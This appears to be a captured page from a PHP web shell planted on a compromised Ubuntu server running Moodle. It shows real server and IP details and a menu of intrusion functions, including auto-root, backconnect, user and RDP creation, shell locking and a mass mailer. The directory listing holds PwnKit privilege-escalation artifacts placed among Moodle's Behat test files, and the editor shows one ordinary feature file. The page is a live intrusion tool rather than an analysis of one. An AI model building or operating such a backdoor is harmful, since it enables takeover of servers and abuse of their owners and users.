Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
completion /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_completion.php
9.87
KB
-rwxrwxrwx
bulk_edit_activity_completion....
4.38
KB
-rwxrwxrwx
completion_course_page_checkbo...
3.91
KB
-rwxrwxrwx
completion_no_calendar_capabil...
1.84
KB
-rwxrwxrwx
completion_other_courses.featu...
1.48
KB
-rwxrwxrwx
default_activity_completion.fe...
3.13
KB
-rwxrwxrwx
enable_manual_complete_mark.fe...
1.8
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
restrict_activity_by_date.feat...
2.9
KB
-rwxrwxrwx
restrict_activity_by_grade.fea...
2.88
KB
-rwxrwxrwx
restrict_section_availability....
4.58
KB
-rwxrwxrwx
teacher_manual_completion.feat...
1.97
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : completion_course_page_checkboxes.feature
@core @core_completion Feature: Show activity completion status or activity completion configuration on the course page In order to understand the configuration or status of an activity's completion As a user I want to see an appropriate checkbox icon besides the activity Background: Given the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | First | teacher1@example.com | | teacher2 | Teacher | Second | teacher2@example.com | | student1 | Student | First | student1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | teacher2 | C1 | teacher | | student1 | C1 | student | And I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on And I navigate to "Edit settings" in current page administration And I set the following fields to these values: | Enable completion tracking | Yes | And I press "Save and display" And the following "activities" exist: | activity | course | idnumber | name | intro | completion | completionview | completionexpected | | forum | C1 | forum1 | Test forum name | Test forum description | 1 | 0 | 0 | And the following "activities" exist: | activity | course | idnumber | name | intro | completion | completionview | completionexpected | | assign | C1 | assign1 | Test assignment name | Test assignment description | 2 | 1 | 0 | And the following "activities" exist: | activity | course | idnumber | name | intro | completion | completionview | completionexpected | | quiz | C1 | quiz1 | Test quiz name | Test quiz description | 0 | 0 | 0 | And I log out Scenario: Show completion status to students Given I log in as "student1" And I am on "Course 1" course homepage Then I should see "Your progress" And the "Test forum name" "Forum" activity with "manual" completion shows a status completion checkbox And the "Test assignment name" "Assign" activity with "auto" completion shows a status completion checkbox And the "Test quiz name" "Quiz" activity does not show any completion checkbox Scenario: Show completion configuration to editing teachers Given I log in as "teacher1" And I am on "Course 1" course homepage Then I should not see "Your progress" And the "Test forum name" "Forum" activity with "manual" completion shows a configuration completion checkbox And the "Test assignment name" "Assign" activity with "auto" completion shows a configuration completion checkbox And the "Test quiz name" "Quiz" activity does not show any completion checkbox And I am on "Course 1" course homepage with editing mode on And I should not see "Your progress" And the "Test forum name" "Forum" activity with "manual" completion shows a configuration completion checkbox And the "Test assignment name" "Assign" activity with "auto" completion shows a configuration completion checkbox And the "Test quiz name" "Quiz" activity does not show any completion checkbox Scenario: Show completion configuration to non-editing teachers Given I log in as "teacher2" And I am on "Course 1" course homepage Then I should not see "Your progress" And the "Test forum name" "Forum" activity with "manual" completion shows a configuration completion checkbox And the "Test assignment name" "Assign" activity with "auto" completion shows a configuration completion checkbox And the "Test quiz name" "Quiz" activity does not show any completion checkbox
Close